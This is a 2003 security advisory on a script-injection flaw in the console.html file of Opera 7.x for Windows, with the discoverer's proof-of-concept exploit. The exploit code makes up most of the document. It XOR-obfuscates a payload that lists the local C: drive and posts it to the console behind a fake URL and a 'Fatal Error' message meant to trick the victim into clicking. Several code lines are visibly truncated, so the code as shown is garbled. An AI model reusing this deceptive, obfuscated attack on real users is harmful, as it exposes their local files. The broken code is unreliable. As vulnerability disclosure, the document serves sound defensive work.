Reported April 28, 2003, by nesumin.

 

 

VERSIONS AFFECTED

 

  • Opera for Windows 7.10 (build 2840), 7.03 (build 2670), 7.02 (build 2668), 7.02 bork (build 2656b), 7.01 (build 2651)

 

DESCRIPTION

 

A vulnerability in Opera for Windows can result in the execution of an arbitrary script in the Local Computer zone. The vulnerability stems from code in Opera 7.x's console.html file that does not sanitize the single quotation mark. The flaw permits a malicious intruder to inject an arbitrary script into the link shown on the Microsoft JavaScript console.

DEMONSTRATION

 

The discoverer posted the following code as proof of concept:

 

==============

 

  This code generates a link on the JavaScript console

  that reads the directory listing of the local disk "C:\" and displays it.

 

  \[1\] replace the "script" instead of "Xploit" and save as html file

  \[2\] upload to WEB server

  \[3\] open with Opera(enable javascript)

  \[4\] click a link on the JavaScript console

 

    ----------------------------------------------------------------

   

    var depth = 1;

    var startdir = "file://localhost/c:/";

 

    // arbitrary script

    var evil_script="";

    evil_script += "function dt(dp)\{\n";

    evil_script += "var i,j,tr,td,b;\n";

    evil_script += "if('complete'fr.document.readyState&&";

    evil_script += "fr.document.getElementsByTagName('base').item(0))\{\n";

    evil_script += "tr=fr.document.getElementsByTagName('tr');\nb='


\\n'";

    evil_script += "+fr.document.getElementsByTagName('base').item(0).href;\n";

    evil_script += "b+='
\\n'+'Count : '+tr.length+'
\\n';\n";

    evil_script += "for(i=1;i

    evil_script += "td = tr.item(i).getElementsByTagName('td');\n";

    evil_script += "if (td.item(0).innerText.match(/^\\.\\.?$/))continue;\n";

    evil_script += "if(dp>0 && td.item(0).getElementsByTagName('img')";

    evil_script += ".item(0).src.match(/\\\\folder\\.gif$/))\n";

    evil_script += "ds.push(td.item(0).getElementsByTagName('a').item(0).href);\n";

    evil_script += "for (j=0;j

    evil_script += "b+='
\\n';\}tree.innerHTML+=b;\n";

    evil_script += "if (0>=ds.length)return;fr.location.href=ds.pop();--dp;\}\n";

    evil_script += "setTimeout('dt('+dp+');',30);\}\nvar ds = new Array(),";

    evil_script += "b = document.getElementsByTagName('body').item(0),";

    evil_script += "f = document.createElement('iframe'),";

    evil_script += "d = document.createElement('div');\n";

    evil_script += "d.setAttribute('id','tree');b.appendChild(d);\n";

    evil_script += "f.style.width=f.style.height=f.style.border=0;\n";

    evil_script += "f.setAttribute('src','"+startdir+"');\n";

    evil_script += "f.setAttribute('id','fr');\n";

    evil_script += "b.appendChild(f);\n";

    evil_script += "dt("+depth+");\n";

 

    // xor and URLEncode

    evil_script = escape(evil_script.replace(/./g,function(s)\{

        return(String.fromCharCode(0x80^s.charCodeAt(0)))\}));

 

    var msg = "http://";

 

    // fake url

    msg += "foo.hogebar.foo/bug?summary=fatal%20error&type=unknown&content=%90%12%38%79%80m";

 

    // code

    msg += "');m='";

    msg += evil_script;

    msg += "';eval(unescape(m).replace(/./g,function(s)\{";

    msg += "return(String.fromCharCode(0x80^s.charCodeAt(0)))\})+'\n";

 

    // fake message

    msg += "\n";

    msg += "Fatal Error !!!!\n\n";

    msg += "  Please click above link.\n"; // :p

 

    opera.postError(msg);

    //window.open("file://localhost/console.html","","");

    location.href = "file://localhost/console.html";

 

   

    ----------------------------------------------------------------

 

VENDOR RESPONSE

 

[Opera](http://www.opera.com/) has yet to respond to this problem.

 

CREDIT

Discovered by nesumin.